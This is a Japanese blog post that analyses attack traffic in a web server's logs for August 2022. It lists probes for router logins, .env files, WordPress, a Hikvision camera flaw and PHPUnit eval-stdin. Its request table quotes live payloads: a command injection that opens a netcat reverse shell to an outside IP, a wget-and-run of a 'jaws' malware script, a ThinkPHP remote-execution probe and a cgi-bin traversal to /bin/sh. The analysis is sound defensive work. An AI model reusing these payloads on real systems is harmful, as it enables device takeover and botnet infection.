webサーバのログの分析2022 8月分

2022-11-01 技術系

公開している web サーバのログから通常のアクセスではない通信について分析しました。

多かったリクエスト

ルータ等のログイン画面があるかの調査

login.cgi

.envの調査

/.env

Hikvision製ネットワークカメラの脆弱性(CVE-2021-36260)

Hikvision製ネットワークカメラの脆弱性を利用するリクエスト
Miraiベースのボットネットに利用されている脆弱性のようです。
Miraiベースのボットネット:MoobotがHikvisionの脆弱性を標的に

/SDK/webLanguage

PHPUnitのevalをリモート実行

PHPのユニットテストツールのPHPUnitの脆弱性を利用してのeval()を実行しようとする通信

Webサイト攻撃にあったログを見る。eval()を使うPHPファイルは狙われている。 | ただ屋ぁのブログ

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Wordpressの情報取集

wlwmanifest.xmlの調査

Windows Live Writerというツールの設定ファイルがあるかの調査

/wp1/wp-includes/wlwmanifest.xml
/wp/wp-includes/wlwmanifest.xml
/wordpress/wp-includes/wlwmanifest.xml
/web/wp-includes/wlwmanifest.xml
/test/wp-includes/wlwmanifest.xml
/site/wp-includes/wlwmanifest.xml
/cms/wp-includes/wlwmanifest.xml
/blog/wp-includes/wlwmanifest.xml
/wp2/wp-includes/wlwmanifest.xml
/wp-includes/wlwmanifest.xml
/website/wp-includes/wlwmanifest.xml
/sito/wp-includes/wlwmanifest.xml
/news/wp-includes/wlwmanifest.xml

ログイン画面の調査

/wp-login.php
/post/wp-login.php

参考情報

Hikvision製ネットワークカメラの脆弱性(CVE-2021-36260)について

JVNDB-2017-005280 - JVN iPedia - 脆弱性対策情報データベース

不審な通信の一覧

uri count
login.cgi 559
/.env 394
/SDK/webLanguage 253
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 175
/ftptest.cgi?loginuse=&loginpas= 146
/set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+31.7.58.162+1245+-e+%2Fbin%2Fsh%29 122
/wp-login.php 117
* 103
/ftptest.cgi 96
/sellers.json 80
/boaform/admin/formLogin 80
/.well-known/ 73
/wp-admin/css/ 71
/uploads/ 71
/sites/default/files/ 71
/images/ 71
/admin/controller/extension/extension/ 71
mstshash=Administr 65
/.git/config 55
/sitemap.txt 54
/sitemap 54
mstshash=Domain 52
/xmlrpc.php?rsd 44
/wp1/wp-includes/wlwmanifest.xml 42
/wp/wp-includes/wlwmanifest.xml 42
/wordpress/wp-includes/wlwmanifest.xml 42
/web/wp-includes/wlwmanifest.xml 42
/test/wp-includes/wlwmanifest.xml 42
/site/wp-includes/wlwmanifest.xml 42
/cms/wp-includes/wlwmanifest.xml 42
/blog/wp-includes/wlwmanifest.xml 42
/wp2/wp-includes/wlwmanifest.xml 41
/wp-includes/wlwmanifest.xml 41
/website/wp-includes/wlwmanifest.xml 41
/sito/wp-includes/wlwmanifest.xml 41
/news/wp-includes/wlwmanifest.xml 41
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 40
/post/wp-login.php 35
/app-ads.txt 34
/HNAP1/ 34
/shop/wp-includes/wlwmanifest.xml 33
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 33
/2019/wp-includes/wlwmanifest.xml 33
/actuator/health 32
/actuator/gateway/routes 32
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 31
/owa/auth/logon.aspx 31
/owa/auth/x.js 30
/_ignition/execute-solution 27
/post/20201116/ 26
/Autodiscover/Autodiscover.xml 26
/console/ 25
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 24
/solr/admin/info/system?wt=json 23
/media/wp-includes/wlwmanifest.xml 23
/2018/wp-includes/wlwmanifest.xml 23
\x00\x00\x00\x00\x00\x00\x00 21
/shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws 21
/shell?cd+/tmp;rm+-rf+*;wget+synns.cf/jaws;sh+/tmp/jaws 20
/manager/html 20
/sitemap.xml 19
/x.php 18
/alfa.php 17

follow us in feedly

comments powered by Disqus

関連記事

新着記事